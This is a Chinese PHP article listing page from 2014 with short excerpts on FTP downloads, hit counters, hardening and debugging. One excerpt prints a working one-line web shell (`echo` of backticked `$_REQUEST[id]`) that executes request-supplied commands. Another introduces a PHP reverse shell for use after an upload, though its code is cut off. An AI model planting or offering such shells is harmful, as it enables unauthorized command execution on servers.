-
php实现从ftp服务器上下载文件树到本地电脑的程序
本文是一个php实现的可以用从ftp服务器上下载文件树到本地电脑的程序,感兴趣的同学参考下. 功能:完成从ftp服务器端下载文件到本地电脑(整体复制即目录树是一样的) /* 用ftp_nlist()函授时,返回的数组值会有两种类型:因服务器不同而异 a:单独的文件名 b:包含目录的文件名。 如果挪用,请注意更改此处...
PHP 2014-12-13 11:54:05 -
防止MySQL注入或HTML表单滥用的PHP程序
据悉,如果表单无担保,MySQL形式的恶意代码注入将攻击网站。HTML表单如下拉菜单,搜索框和复选框都容易成为这类型侵入的切入点...
PHP 2014-12-13 06:06:03 -
php一句话cmdshell新型 (非一句话木马)
本文为大家讲解了一个新的一句话木马写法:"`"(键盘上~符号的下档键),和python中一样,这个符号中的命令会被php解析器执行,感兴趣的同学参考下. php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型); <?php /*一个新型的php一句话cmdshell(非一句话木马) //原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型); //局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码; //write by skyfire */ echo `$_REQUEST[id]`; ?> ...
PHP 2014-12-13 05:27:08 -
页面上隐性调用php程序的方法
本文为大家讲解的是在网页上隐性的调用php程序的方法,其一就是在script的src里调用php文件,感兴趣的同学参考下. 比较通用的方法,下面是调用php简单的计数器。 调用方法: <script language = "javascript" src = "count.php"></script> count.php源码: <?php $file_name = "count.txt"; $fp = fopen($file_name,"r"); //打开文件读入当前计数 $count = fread($fp, filesize($file_name)); fclose($fp); $count++; //计数加1 $fp = fopen($file_name, "w"); //再次打开文件写入更新后的计数 fwrite($fp, $count); fclose($fp); echo "document.wr...
PHP 2014-12-13 03:06:05 -
PHP 木马攻击防御技巧
本文为大家讲解了php开发中的木马攻击防御技巧,感兴趣的同学参考下. 实际上我们还可以通过设置各个文件夹的权限,来让apache用户只能执行我们想让它能干的事情,给每一个目录建立一个单独能读写的用户。 1、防止跳出web目录 首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径...
PHP 2014-12-13 00:42:04 -
程序员大爱,有一种神器叫“跑步机办公桌”
站长搜索(www.adminso.com):程序员大爱,有一种神器叫“跑步机办公桌” 它看上去是张办公桌,其实它是一台跑步机。这可不是周星驰《国产凌凌漆》里的桥段,而是一样实实在在存在的宝物...
业界动态 2014-12-12 22:03:07 -
php反弹shell实现代码(反弹木马)
本文为大家讲解了一个php实现的反弹shell的示例代码(反弹木马),并简单讲解了他的原理,感兴趣的同学研究学习下. 遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。 非常无 奈,没想 到什么好的办法,后来灵光一闪...
PHP 2014-12-12 12:06:13 -
PHP获得文件的md5并检验是否被修改(可用来防止木马)
本文为大家讲解的是php通过md5_file函数获得文件的md5并检验是否被修改,一般可以用来防止木马,或源程序被修改,感兴趣的同学参考下。 由于需要判断上传的文件是否被修改过,需要记录上传文件的md5值,所以这里说一下一下获取文件md5值的方法...
PHP 2014-12-12 04:27:09 -
PHP 程序授权验证开发思路
本文为大家讲解 了PHP 的程序授权验证开发思路,主要用于商业程序,防治盗版,感兴趣的同学参考下. 需求: 做一套商业程序,如只充许客户只能用于一台服务器,授权验证就很重要了。 以下是我的一个想法,把服务器的php环境配置也应用在程序里面,生成一个许可字串,然后将字串写入到许可的文件代码中...
PHP 2014-12-12 00:54:04 -
-
PHPLog php 程序调试追踪工具
本文将为你介绍一个调试工具,它可以替代echo,print_r,var_dump等系统函数,还具有调用栈及参数追踪功能. 简言之,它是debug_backtrace的web版本...
PHP 2014-12-11 14:42:34 -
php 文件夹删除、php清除缓存程序
本文是一个php 文件夹删除、php清除缓存程序的示例代码,感兴趣的同学参考下. <?php header('content-type:text/html;charset=utf-8'); function delFile($fpath) { $filesize = array(); $filepath = iconv('gb2312', 'utf-8', $fpath); if (is_dir($fpath)) { if ($dh = opendir($fpath)) { while (($file = readdir($dh)) !== false) { if($file != '...
PHP 2014-12-11 14:27:06
